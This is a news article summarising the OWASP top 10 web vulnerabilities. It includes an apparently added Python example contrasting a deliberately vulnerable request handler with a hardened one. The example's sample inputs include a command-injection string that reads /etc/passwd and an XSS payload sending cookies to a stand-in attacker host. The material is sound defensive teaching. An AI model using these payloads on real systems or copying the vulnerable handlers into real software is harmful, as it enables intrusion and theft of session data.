Open-source group names 10 scariest Web vulnerabilities

The Open Web Application Security Project today released a list of the top 10 vulnerabilities in Web applications and services.

The group said it wants to focus government and private-sector attention on common weaknesses 'that require immediate remediation.'

'Also, in the longer term, this list is intended to be used by development teams and their managers during project planning,' the report noted. 'Ultimately, Web application developers must achieve a culture shift that integrates security into every aspect of their projects.'

OWASP is a volunteer open-source community project created to bring attention to security for online apps. It patterned its list on the SANS Institute and FBI top 20 list of network vulnerabilities. Like the SANS-FBI list, the OWASP vulnerabilities are well known, but continue to represent significant risk because they are widespread. They can be exploited through ordinary HTTP requests, which intrusion detection systems often do not flag and which firewalls pass through to the server regardless of how it has been hardened.

The vulnerabilities, which focus on categories of problems rather than on specific applications, are:

  • Unvalidated parameters, which let information from a request be used by an app before it has been validated

  • Broken access control, in which restrictions on authorized users are not enforced

  • Broken account and session management, which leave inadequately protected account credentials and session tokens vulnerable to hijacking

  • Cross-site scripting flaws, in which an app passes attacker-supplied content to a user's browser, which then executes it

  • Buffer overflows, which can crash an application or allow it to be taken over

  • Command injection flaws, in which improper commands are passed by the app to another system for execution

  • Error-handling problems, which can provide an attacker with unintended information or deny service when errors occur

  • Insecure use of cryptography, which provides weak protection when cryptography code is not properly integrated

  • Remote administration flaws, in which administrative functions are not well protected

  • Web and application server misconfiguration.
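Three of the categories above (unvalidated parameters, cross-site scripting and command injection) usually appear together in one request handler. The following is an added illustration, not code from the OWASP report or from this article: a hypothetical "ping a host" handler written once with the raw parameter used directly, and once with the parameter validated against an allowlist, passed as an argument vector instead of a shell string, and HTML-escaped before it is reflected back. The sample request values are constructed for the example.

```python
import html
import ipaddress
import re

# Constructed sample request parameters (not from the article).
BENIGN_HOST = "192.0.2.10"
INJECTED_HOST = "192.0.2.10; cat /etc/passwd"
XSS_HOST = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Hypothetical RFC 1123-style hostname pattern: labels of 1-63 alphanumerics or
# hyphens, no leading/trailing hyphen, joined by dots.
_HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


# --- Vulnerable form: the parameter is trusted as received --------------------

def build_command_vulnerable(host: str) -> str:
    """Concatenates the unvalidated parameter into a shell command string.

    Anything after a ';' in `host` becomes a second command: command injection.
    """
    return f"ping -c 1 {host}"


def render_vulnerable(host: str) -> str:
    """Reflects the unvalidated parameter into HTML without escaping.

    A <script> element in `host` is handed to the user's browser: cross-site scripting.
    """
    return f"<p>Results for {host}</p>"


# --- Hardened form: validate, then use safe sinks ------------------------------

def validate_host(host: str) -> str:
    """Returns `host` only if it is an IP literal or a plain hostname; otherwise raises."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if len(host) <= 253 and _HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"invalid host parameter: {host!r}")


def is_valid_host(host: str) -> bool:
    """Boolean wrapper around validate_host for callers that prefer a check to an exception."""
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def build_command_hardened(host: str) -> list:
    """Returns an argument vector (argv) rather than a shell string.

    subprocess.run(argv) with shell=False passes `host` as a single argument,
    so shell metacharacters in it are never interpreted. Validation runs first,
    so a malformed value is rejected before it reaches any command.
    """
    return ["ping", "-c", "1", validate_host(host)]


def render_hardened(host: str) -> str:
    """Escapes the parameter before it is placed in an HTML text context."""
    return f"<p>Results for {html.escape(host, quote=True)}</p>"


if __name__ == "__main__":
    print("vulnerable command :", build_command_vulnerable(INJECTED_HOST))
    print("hardened command   :", build_command_hardened(BENIGN_HOST))
    print("hardened rejects   :", not is_valid_host(INJECTED_HOST))
    print("vulnerable html    :", render_vulnerable(XSS_HOST))
    print("hardened html      :", render_hardened(XSS_HOST))
```

The hardened handler does not try to strip dangerous characters out of the parameter; it accepts only values that match what a host parameter should look like and rejects everything else, then chooses sinks (an argv list and an HTML escaper) that cannot reinterpret the value as code.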

The complete report is available on the organization's Web site, www.owasp.org.

    About the Author

    William Jackson is a Maryland-based freelance writer.
